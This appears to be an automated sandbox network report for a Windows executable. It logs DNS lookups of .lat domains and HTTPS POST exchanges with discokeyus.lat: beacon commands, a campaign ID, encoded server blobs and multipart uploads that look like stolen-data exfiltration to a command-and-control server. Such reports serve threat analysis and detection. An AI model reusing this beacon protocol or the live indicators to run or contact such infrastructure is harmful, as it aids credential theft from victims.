                                                                                                                                            Dec 20, 2024 17:25:01.342070103 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.342174053 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.342289925 CET49732443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.342303991 CET44349732104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.387939930 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.387984037 CET44349734104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:01.388088942 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.388401985 CET49734443192.168.2.5104.21.21.99
                                                                                                                                            Dec 20, 2024 17:25:01.388415098 CET44349734104.21.21.99192.168.2.5
                                                                                                                                            Dec 20, 2024 17:25:02.023217916 CET49734443192.168.2.5104.21.21.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:24:42.007546902 CET | 62912 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 17:24:42.145601034 CET | 53 | 62912 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 17:24:42.151072979 CET | 57795 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 17:24:42.288929939 CET | 53 | 57795 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 17:24:42.292480946 CET | 54618 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 17:24:42.433379889 CET | 53 | 54618 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:24:42.007546902 CET | 192.168.2.5 | 1.1.1.1 | 0x4ccb | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:24:42.151072979 CET | 192.168.2.5 | 1.1.1.1 | 0x2a53 | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:24:42.292480946 CET | 192.168.2.5 | 1.1.1.1 | 0x4eb9 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:24:42.145601034 CET | 1.1.1.1 | 192.168.2.5 | 0x4ccb | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:24:42.288929939 CET | 1.1.1.1 | 192.168.2.5 | 0x2a53 | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:24:42.433379889 CET | 1.1.1.1 | 192.168.2.5 | 0x4eb9 | No error (0) | discokeyus.lat | | 104.21.21.99 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:24:42.433379889 CET | 1.1.1.1 | 192.168.2.5 | 0x4eb9 | No error (0) | discokeyus.lat | | 172.67.197.170 | A (IP address) | IN (0x0001) | false
• discokeyus.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:43 UTC | 261 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: discokeyus.lat
2024-12-20 16:24:43 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-20 16:24:44 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:24:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5l1cmiuhe0qged7ejojfv7bl6b; expires=Tue, 15 Apr 2025 10:11:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sw2aiszGhajzObR3nvnbfbr7r8SrDv%2BrksMocq%2Bnt0o7KKupqBG1guf%2FxpUcHrkjmt4WFU8n7Eu4B9hvY5%2FZt7Ray0rNMnyfN4GKZv3X8ByYdRKl5uTtj1CCxdFsjf7vdw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50fbfa9e16191e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1693&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1724748&cwnd=238&unsent_bytes=0&cid=4d5bd0c92d783d9e&ts=775&x=0"
2024-12-20 16:24:44 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-20 16:24:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:46 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: discokeyus.lat
2024-12-20 16:24:46 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-20 16:24:46 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:24:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gj4uj8619276r9qg3obirpc5hm; expires=Tue, 15 Apr 2025 10:11:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITDwHKnYqkEYSyjVKSMEbiQrLAChpvcVqz7cyNAiUa7MXvVw2G6W%2FN6J89QH%2BKHM7IKNn0i4536rQmLkHJRxYPcv%2B8uZw5O7yUVYM02hzoqtjTvLBUZ8tTHwqRbHN0d7mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50fc08df114340-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2125&rtt_var=808&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1344383&cwnd=217&unsent_bytes=0&cid=50a9bbcb360cbf3d&ts=1002&x=0"
                                                                                                                                            2024-12-20 16:24:46 UTC243INData Raw: 63 35 35 0d 0a 4e 36 73 57 2b 51 63 2b 31 76 65 4e 57 68 2f 69 6f 64 31 4f 72 2b 72 66 6a 65 34 4c 79 6e 57 42 75 30 65 4f 45 59 53 50 31 71 52 4d 69 57 44 62 50 51 72 36 31 66 34 2f 50 64 6a 56 72 7a 76 4b 78 76 33 73 69 69 6e 77 45 2b 44 58 4e 4f 73 39 70 76 6d 37 68 67 33 4e 64 35 56 30 57 2f 72 56 36 43 49 39 32 50 71 6d 62 4d 71 45 2f 62 66 4d 62 71 41 58 34 4e 63 6c 37 33 72 72 2f 37 72 48 58 38 64 78 6b 57 4a 64 73 70 62 68 4e 33 71 48 78 4c 77 6b 77 59 4f 79 35 59 4d 70 35 6c 66 6b 77 57 57 30 4d 38 6e 71 6f 73 56 36 79 6d 57 53 4a 55 50 36 6a 4b 38 2f 63 63 43 62 2f 79 2f 4b 69 4c 50 72 69 6d 43 69 48 65 6e 66 4a 4f 70 37 39 4f 61 77 7a 46 2f 4a 63 70 42 6f 56 4b 61 62 36 7a 42 78 67 63 36 38 62 49 50 49 75 76
                                                                                                                                            Data Ascii: c55N6sW+Qc+1veNWh/iod1Or+rfje4LynWBu0eOEYSP1qRMiWDbPQr61f4/PdjVrzvKxv3siinwE+DXNOs9pvm7hg3Nd5V0W/rV6CI92PqmbMqE/bfMbqAX4Ncl73rr/7rHX8dxkWJdspbhN3qHxLwkwYOy5YMp5lfkwWW0M8nqosV6ymWSJUP6jK8/ccCb/y/KiLPrimCiHenfJOp79OawzF/JcpBoVKab6zBxgc68bIPIuv
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 66 4d 4d 65 68 45 30 64 6f 30 2f 57 62 72 2f 62 4b 47 53 6f 64 74 32 32 4a 51 39 4d 32 76 4d 48 47 4f 78 72 77 6a 79 6f 6d 39 2f 59 4e 70 71 78 2f 72 33 53 2f 6a 66 4f 6e 6a 76 73 46 64 77 48 4f 55 59 6c 53 79 6d 75 78 34 4d 38 44 45 70 32 79 56 79 4a 33 2f 6a 32 71 38 47 76 4b 5a 4f 71 4a 71 70 75 71 34 68 67 32 4a 63 70 56 6b 55 62 53 48 35 7a 4e 32 68 64 47 30 4a 63 43 46 76 65 4b 47 5a 71 73 58 35 4e 4d 76 34 33 6e 69 34 4c 6e 41 56 63 6b 30 31 53 56 62 72 4e 57 33 65 46 36 46 30 37 67 67 32 38 71 48 72 35 4d 6e 73 56 66 6b 31 57 57 30 4d 2b 37 6f 74 38 56 65 78 6e 65 54 62 6b 36 30 68 2b 6b 31 65 4a 4c 46 75 69 4c 48 69 36 2f 6c 67 6d 2b 72 48 75 6a 51 49 4f 74 33 70 71 50 30 77 55 32 4a 4c 4e 74 45 55 62 2b 5a 35 53 39 39 77 4e 7a 78 4e 59 32 50 73
                                                                                                                                            Data Ascii: fMMehE0do0/Wbr/bKGSodt22JQ9M2vMHGOxrwjyom9/YNpqx/r3S/jfOnjvsFdwHOUYlSymux4M8DEp2yVyJ3/j2q8GvKZOqJqpuq4hg2JcpVkUbSH5zN2hdG0JcCFveKGZqsX5NMv43ni4LnAVck01SVbrNW3eF6F07gg28qHr5MnsVfk1WW0M+7ot8VexneTbk60h+k1eJLFuiLHi6/lgm+rHujQIOt3pqP0wU2JLNtEUb+Z5S99wNzxNY2Ps
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 6e 47 75 2b 5a 61 36 78 30 2f 71 33 73 68 6e 2f 4b 59 4a 68 76 48 6f 47 57 34 54 5a 36 6c 6f 4f 67 59 74 54 49 75 75 50 4d 4d 65 67 61 34 74 45 6a 2f 6e 7a 72 37 72 72 49 57 73 78 37 6b 32 56 63 75 5a 44 72 4d 33 61 44 7a 72 73 2b 78 34 69 31 36 6f 31 6a 6f 6c 65 74 6d 53 4c 30 4d 37 36 74 68 64 46 65 69 30 47 59 61 31 4b 7a 67 36 38 6e 4d 35 6d 44 75 43 43 4e 30 50 33 69 68 47 79 74 47 4f 4c 54 4b 2b 6c 35 36 75 57 36 78 55 66 47 63 4a 74 70 56 4c 36 59 34 54 78 31 69 63 69 30 4b 73 32 4a 74 36 2f 43 4b 61 38 50 6f 34 46 6c 32 48 54 71 34 4c 75 45 59 4d 70 36 6c 57 4a 4b 39 49 71 68 49 54 32 48 7a 2f 39 30 6a 59 53 30 37 34 64 6a 72 42 66 6b 31 43 44 76 64 4f 58 67 73 38 78 62 7a 6e 43 58 62 46 47 79 6c 65 67 38 65 4a 4c 47 74 69 44 42 79 50 4f 76 69 33
                                                                                                                                            Data Ascii: nGu+Za6x0/q3shn/KYJhvHoGW4TZ6loOgYtTIuuPMMega4tEj/nzr7rrIWsx7k2VcuZDrM3aDzrs+x4i16o1joletmSL0M76thdFei0GYa1Kzg68nM5mDuCCN0P3ihGytGOLTK+l56uW6xUfGcJtpVL6Y4Tx1ici0Ks2Jt6/CKa8Po4Fl2HTq4LuEYMp6lWJK9IqhIT2Hz/90jYS074djrBfk1CDvdOXgs8xbznCXbFGyleg8eJLGtiDByPOvi3
                                                                                                                                            2024-12-20 16:24:46 UTC183INData Raw: 6d 53 4c 67 4d 37 36 74 76 63 39 48 78 33 71 53 61 46 71 38 6b 75 45 31 64 6f 62 49 75 43 76 4c 68 62 58 69 69 57 71 70 45 2b 6e 4c 4a 75 64 35 36 2b 66 30 69 42 58 4f 62 4e 73 39 48 4a 4f 5a 78 69 68 6d 6b 74 58 2f 4d 34 4f 52 2f 65 69 41 4b 66 42 58 34 4e 59 73 34 33 76 75 34 72 76 43 57 38 39 79 6c 6d 42 54 76 6f 66 6e 4e 6e 43 4c 7a 4c 51 2b 7a 59 57 35 34 34 68 68 6f 78 32 6a 6c 32 58 72 61 36 61 31 39 50 4e 59 78 6e 53 59 63 78 79 72 32 2f 5a 34 65 6f 79 44 35 32 7a 42 68 72 33 67 67 47 57 6a 48 2b 4c 56 4b 2b 74 32 37 2b 57 38 31 0d 0a
                                                                                                                                            Data Ascii: mSLgM76tvc9Hx3qSaFq8kuE1dobIuCvLhbXiiWqpE+nLJud56+f0iBXObNs9HJOZxihmktX/M4OR/eiAKfBX4NYs43vu4rvCW89ylmBTvofnNnCLzLQ+zYW544hhox2jl2Xra6a19PNYxnSYcxyr2/Z4eoyD52zBhr3ggGWjH+LVK+t27+W81
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 33 63 63 37 0d 0a 46 54 4e 66 4a 70 72 55 37 57 52 36 6a 31 35 68 38 65 35 49 34 33 47 2f 65 69 55 4b 66 42 58 7a 50 34 51 72 6c 4c 63 72 61 75 49 54 49 6c 7a 6c 79 55 45 39 4a 6e 73 4e 48 57 50 78 62 59 67 78 34 47 32 34 34 64 74 70 42 37 6d 33 79 54 70 64 75 66 70 75 4d 78 54 79 6e 65 55 61 6c 4f 38 31 61 46 34 65 70 69 44 35 32 7a 6f 6e 37 62 68 69 69 6d 33 57 66 71 5a 49 75 41 7a 76 71 32 34 7a 31 50 50 63 5a 64 6b 57 72 79 51 35 7a 78 38 68 73 57 38 49 38 6d 4e 76 4f 43 49 5a 61 59 64 34 74 67 70 35 33 7a 74 36 50 53 49 46 63 35 73 32 7a 30 63 68 5a 62 35 4c 32 32 4d 67 36 42 69 31 4d 69 36 34 38 77 78 36 42 62 78 30 79 2f 69 64 75 6e 6f 74 38 6c 53 78 48 4b 58 62 31 57 38 6b 2b 41 78 62 34 50 50 73 53 76 44 68 4c 50 69 68 6d 71 6c 56 36 32 5a 49 76
                                                                                                                                            Data Ascii: 3cc7FTNfJprU7WR6j15h8e5I43G/eiUKfBXzP4QrlLcrauITIlzlyUE9JnsNHWPxbYgx4G244dtpB7m3yTpdufpuMxTyneUalO81aF4epiD52zon7bhiim3WfqZIuAzvq24z1PPcZdkWryQ5zx8hsW8I8mNvOCIZaYd4tgp53zt6PSIFc5s2z0chZb5L22Mg6Bi1Mi648wx6Bbx0y/idunot8lSxHKXb1W8k+Axb4PPsSvDhLPihmqlV62ZIv
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 76 4d 31 61 7a 32 61 58 61 30 36 78 68 2f 31 34 4d 38 44 45 70 32 79 56 79 49 76 6f 6e 48 6d 72 56 64 4c 50 4a 76 70 34 36 2b 48 30 32 52 76 51 4e 4a 78 70 48 4f 7a 56 36 54 64 30 67 38 79 2b 4a 63 47 46 75 4f 61 4a 61 4b 34 54 36 64 4d 6c 36 6e 58 6e 36 4c 37 46 56 4d 4e 39 6e 47 31 62 74 34 65 76 64 6a 32 48 32 2f 39 30 6a 61 47 36 2f 59 4a 35 36 41 69 74 77 47 58 72 66 36 61 31 39 4d 4a 66 78 6e 43 63 61 56 71 78 6b 2b 49 35 63 6f 48 44 73 43 6a 47 67 62 76 75 67 57 79 6c 45 2f 48 54 4c 75 4e 2f 37 2b 47 35 68 68 75 4a 63 34 4d 6c 42 50 53 6b 34 6a 5a 7a 68 39 58 2f 4d 34 4f 52 2f 65 69 41 4b 66 42 58 34 74 55 71 37 33 7a 6c 37 72 58 4d 52 39 74 34 6b 6d 31 5a 75 4a 37 68 50 6d 2b 47 7a 4c 59 76 7a 6f 47 36 35 34 42 6a 71 78 43 6a 6c 32 58 72 61 36 61
                                                                                                                                            Data Ascii: vM1az2aXa06xh/14M8DEp2yVyIvonHmrVdLPJvp46+H02RvQNJxpHOzV6Td0g8y+JcGFuOaJaK4T6dMl6nXn6L7FVMN9nG1bt4evdj2H2/90jaG6/YJ56AitwGXrf6a19MJfxnCcaVqxk+I5coHDsCjGgbvugWylE/HTLuN/7+G5hhuJc4MlBPSk4jZzh9X/M4OR/eiAKfBX4tUq73zl7rXMR9t4km1ZuJ7hPm+GzLYvzoG654BjqxCjl2Xra6a
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 39 41 30 6e 47 6b 63 37 4e 58 70 4d 58 75 48 78 62 45 2b 79 49 36 79 34 49 56 67 72 42 2f 67 32 53 48 6f 64 4f 50 75 75 4d 31 53 79 6e 75 66 62 46 4b 39 6d 71 39 32 50 59 66 62 2f 33 53 4e 71 61 62 73 67 47 54 6f 43 4b 33 41 5a 65 74 2f 70 72 58 30 79 6c 76 4d 64 4a 46 6a 57 4c 47 54 35 54 31 39 69 38 43 77 4b 4d 75 4d 73 75 2b 48 59 4b 6b 52 35 74 4d 75 36 6e 37 6c 36 37 4b 47 47 34 6c 7a 67 79 55 45 39 4c 58 30 4e 58 47 48 67 36 42 69 31 4d 69 36 34 38 77 78 36 42 7a 76 33 53 4c 73 66 75 58 6c 73 63 4a 66 7a 48 53 54 64 31 53 30 6b 76 30 71 66 59 6e 47 73 79 2f 4e 6a 4c 76 6d 69 6d 71 73 56 36 32 5a 49 76 51 7a 76 71 32 5a 79 6c 4c 67 63 34 41 6c 51 2f 71 4d 72 7a 39 78 77 4a 76 2f 4c 63 61 43 73 75 4b 50 62 36 73 63 35 74 4d 6b 36 33 76 72 2f 37 66 4a
                                                                                                                                            Data Ascii: 9A0nGkc7NXpMXuHxbE+yI6y4IVgrB/g2SHodOPuuM1SynufbFK9mq92PYfb/3SNqabsgGToCK3AZet/prX0ylvMdJFjWLGT5T19i8CwKMuMsu+HYKkR5tMu6n7l67KGG4lzgyUE9LX0NXGHg6Bi1Mi648wx6Bzv3SLsfuXlscJfzHSTd1S0kv0qfYnGsy/NjLvmimqsV62ZIvQzvq2ZylLgc4AlQ/qMrz9xwJv/LcaCsuKPb6sc5tMk63vr/7fJ
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 6b 6c 42 50 54 53 37 43 70 76 68 73 43 70 4c 34 71 32 67 38 69 61 59 36 38 48 35 4d 34 71 72 44 32 6d 34 76 53 65 62 49 6c 39 6e 48 35 4e 6f 70 6a 2f 50 7a 32 2f 6a 66 38 30 6a 64 44 39 32 6f 39 6e 70 68 44 31 79 47 6a 4c 5a 65 7a 71 70 4d 46 43 78 6a 54 56 4a 56 72 30 7a 62 78 32 50 59 54 53 2f 33 53 64 32 75 61 36 33 7a 37 34 52 66 79 58 50 4b 78 6c 70 72 58 6d 69 42 58 62 4e 4d 4d 6c 47 37 65 48 2f 54 35 2b 6c 73 44 34 45 76 4f 76 70 2b 4b 4b 66 72 6b 70 33 64 34 2f 34 58 58 78 2f 50 6a 54 56 73 64 36 6e 48 4d 63 2b 74 58 67 65 43 57 35 67 2f 64 73 38 73 62 39 39 38 77 78 36 43 4c 67 31 79 76 72 5a 66 65 67 6b 39 78 59 7a 32 4f 4b 4a 52 4c 30 6b 36 39 67 4c 63 36 44 75 7a 32 4e 30 4f 32 39 31 7a 7a 37 51 4c 4f 4c 4f 71 4a 71 70 76 76 30 6e 67 65 48 4e
                                                                                                                                            Data Ascii: klBPTS7CpvhsCpL4q2g8iaY68H5M4qrD2m4vSebIl9nH5Nopj/Pz2/jf80jdD92o9nphD1yGjLZezqpMFCxjTVJVr0zbx2PYTS/3Sd2ua63z74RfyXPKxlprXmiBXbNMMlG7eH/T5+lsD4EvOvp+KKfrkp3d4/4XXx/PjTVsd6nHMc+tXgeCW5g/ds8sb998wx6CLg1yvrZfegk9xYz2OKJRL0k69gLc6Duz2N0O291zz7QLOLOqJqpvv0ngeHN
                                                                                                                                            2024-12-20 16:24:46 UTC1369INData Raw: 30 6d 71 39 67 52 4d 43 4c 2f 78 4f 44 79 4b 57 76 31 43 6d 64 46 4f 33 58 49 76 70 69 71 38 71 36 77 56 54 66 5a 49 78 71 48 50 72 56 36 58 67 6c 30 6f 33 2f 4b 4e 7a 49 35 62 2f 65 4d 76 31 45 74 49 6c 33 38 7a 33 2f 72 61 4b 47 44 5a 73 36 32 33 63 63 37 4e 57 6f 4f 32 2b 53 78 62 77 36 7a 73 2b 44 30 61 74 6e 72 78 62 31 79 54 4c 6a 50 4d 6a 62 6c 66 68 72 33 48 65 56 61 31 75 69 68 4b 39 32 50 59 2b 44 35 78 57 4e 77 50 33 51 77 69 6d 77 56 37 75 5a 45 4f 39 39 36 4f 71 69 31 78 6a 75 65 70 78 6b 53 71 53 43 34 48 64 54 74 75 4c 2f 59 6f 32 4f 2f 62 66 65 4a 2b 67 54 38 70 6c 39 76 43 47 39 75 4f 65 52 42 5a 74 72 31 58 77 63 6f 74 57 33 61 6a 50 41 30 66 39 30 6a 63 2b 2b 2f 5a 35 76 71 77 48 67 6e 68 76 53 56 4f 6a 71 74 64 42 46 78 48 69 36 5a 6b
                                                                                                                                            Data Ascii: 0mq9gRMCL/xODyKWv1CmdFO3XIvpiq8q6wVTfZIxqHPrV6Xgl0o3/KNzI5b/eMv1EtIl38z3/raKGDZs623cc7NWoO2+Sxbw6zs+D0atnrxb1yTLjPMjblfhr3HeVa1uihK92PY+D5xWNwP3QwimwV7uZEO996Oqi1xjuepxkSqSC4HdTtuL/Yo2O/bfeJ+gT8pl9vCG9uOeRBZtr1XwcotW3ajPA0f90jc++/Z5vqwHgnhvSVOjqtdBFxHi6Zk


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49724 | 104.21.21.99 | 443 | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:48 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0BYKMF78EM1G5TZVS53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12841
Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:48 UTC12841OUTData Raw: 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 59 4b 4d 46 37 38 45 4d 31 47 35 54 5a 56 53 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                            Data Ascii: --0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="pid"2--0BYKMF78EM1G5TZVS53Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-20 16:24:49 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:24:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=clb53fat419t0sqm5846jdpcrp; expires=Tue, 15 Apr 2025 10:11:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2WbtEwfCFURSXRFN9oAZ6oepANFRiY8eqBb8dLOlX6WT1PEUA1p6Peci%2B1uLfcK34j3yTIFw92wYSwlNS1ggxNnCtqVMLrFHZbmAhKmD%2F%2BxLxoSs8L9VbOuCaHrCUrGzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50fc194a348cc6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1827&rtt_var=688&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13780&delivery_rate=1586094&cwnd=222&unsent_bytes=0&cid=9eff07af971e84ce&ts=918&x=0"
2024-12-20 16:24:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:24:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49727 | 104.21.21.99 | 443 | 1732 | C:\Users\user\Desktop\0WO49yZcDA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:24:51 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=IT89N01QY0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15029
Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:51 UTC15029OUTData Raw: 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 49 54 38 39 4e 30 31 51 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                            Data Ascii: --IT89N01QY0Content-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--IT89N01QY0Content-Disposition: form-data; name="pid"2--IT89N01QY0Content-Disposition: form-data; name="lid"PsFKDg--pablo--IT89N01QY0Content-
                                                                                                                                            2024-12-20 16:24:52 UTC1132INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:52 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=h280ieae9m9n8m5pqd6a3220an; expires=Tue, 15 Apr 2025 10:11:30 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
